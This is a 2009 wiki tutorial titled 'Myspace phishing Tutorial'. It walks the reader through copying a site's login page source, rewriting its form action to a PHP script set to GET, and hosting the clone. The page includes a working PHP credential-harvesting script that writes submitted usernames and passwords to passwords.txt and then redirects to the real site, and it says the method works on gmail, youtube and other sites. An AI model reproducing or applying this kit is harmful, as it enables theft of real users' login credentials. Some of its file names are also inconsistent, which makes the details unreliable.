Myspace phishing TutorialThis is a featured page

*Updated* Written by Canakar

In this tutorial i will be teaching you how to phish almost any website simply and easily in very little steps and with no knowledge of hacking what so ever!
(for this tutorial we will be using the website myspace and ripway.com this tutorial can be used on any website you wish to Phish)
(to host a phished website you need a website that allows PHP)


First you wanna start then's off by picking your website to host you phished materiel, I recommend www.ripway.com, I'm pretty sure you know how to make a simple website so i will not be posting on how in this tutorial.

Now let's get our fake website html! lets goto www.myspace.com and right click the page, once you right click alittle menu will pop up scroll down to "View Page Source" and click it.

Now a little window like the one below will pop up.

Myspace phishing Tutorial - Black Library


in this window you want to right click and click "Select All" and Click "Copy"

Now that we have that copied lets open Notepad. Myspace phishing Tutorial - Black Library

Paste the copied HTML into the notepad file and press Ctrl + F to open search

Should look like this.

Myspace phishing Tutorial - Black Library

In that box we need to type "Form action"

Note* make sure you are scrolled all the way to the top of the document and the direction setting is down to help avoid confusion.

Once you have clicked find next you should come to HTML coding that looks like this.
[MAKE SURE IT LOOKS LIKE THAT]
Myspace phishing Tutorial - Black Library

What we are going to do here is remove the highlighted link show below.

Myspace phishing Tutorial - Black Library

Replace that link with "login.php"

It should now look like this.

Myspace phishing Tutorial - Black Library

now notice the highlighted area show below.

Myspace phishing Tutorial - Black Library

We want to change that to get.

now save the file as myspace.txt now open up winrar on your computer goto the file (to where ever you saved it) and rename to myspace.htm

now upload that to your files on your website (if you are using ripway the image below may help)

Myspace phishing Tutorial - Black Library

make sure the file you are uploading is named "myspace.html"

now that is uploaded we need to create our Post.php file

here is one i coded for you below

<?php
header("Location: http://www.myspace.com");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, ":");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

File download: http://attachments.wetpaintserv.us/1hQ2zANw3BFin%2BOkkMukqA%3D%3D305

Now download that file from our server and upload it to your website

THERE U HAVE IT NOW YOU HAVE SETUP YOUR PHISHED WEBSITE, SIMPLY TYPE IN A USERNAME AND PASSWORD AND IT WILL POP UP IN YOUR FILE (ON YOUR WEBSITE)

Note* if you are using this tutorial for other websites like habbo, youtube, gmail, anything be sure to change the link in the php file to the website you are phishing.





No user avatar
Canakar
Latest page update: made by Canakar , Feb 19 2009, 12:08 AM EST (about this update About This Update Canakar Edited by Canakar

No content added or deleted.

- complete history)
Keyword tags: Myspace Phish Phishing
More Info: links to this page
Started By Thread Subject Replies Last Post
Mr.Guy6 suspended 0 Jun 17 2009, 8:44 PM EDT by Mr.Guy6
Thread started: Jun 17 2009, 8:44 PM EDT  Watch
when i was uploading the post.php file i had to log in cause my session is over when i entered everything in it said"This account has been suspended. The reason recorded is: " and there was nothing after that wut happen
Do you find this valuable?    
Keyword tags: None
Showing 1 of 1 threads for this page
Unknown File login.php (Unknown File - 0k)
posted by Canakar   Feb 18 2009, 5:04 PM EST
This attachment has no description.

Related Content

  (what's this?Related ContentThanks to keyword tags, links to related pages and threads are added to the bottom of your pages. Up to 15 links are shown, determined by matching tags and by how recently the content was updated; keeping the most current at the top. Share your feedback on Wetpaint Central.)